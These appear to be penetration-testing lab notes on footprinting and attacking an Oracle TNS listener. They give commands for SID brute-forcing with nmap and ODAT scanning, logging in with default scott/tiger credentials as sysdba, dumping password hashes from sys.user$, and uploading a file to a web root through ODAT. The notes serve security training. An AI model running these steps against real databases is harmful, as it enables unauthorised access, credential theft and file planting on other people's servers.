Oracle Transparent Network Substrate

Footprinting The Service

Tool Setup

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools

Nmap

sudo nmap -p1521 -sV 10.129.204.235 --open

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT

./odat.py all -s 10.129.204.235

the odat.py tool to perform a variety of scans like retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations etc.

SQLplus - Log In

sqlplus scott/tiger@10.129.204.235/XE

You can also attempt to append "as sysdba" for higher privileges

If you come across the following error sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory execute the following command

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Oracle RDBMS - Interaction

Oracle RDBMS - Database Enumeration

sqlplus scott/tiger@10.129.204.235/XE as sysdba

Try using the valid account to log in as the System Database Admin (sysdba), giving higher privileges. This is possible when the user has the appropriate privileges typically granted by the database administrator.

Oracle RDBMS - Extract Password Hashes

select name, password from sys.user$;

Oracle RDBMS - File Upload

OS	Path
Linux	/var/www/html
Windows	C:\inetpub\wwwroot

echo "Oracle File Upload Test" > testing.txt

./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

curl -X GET http://10.129.204.235/testing.txt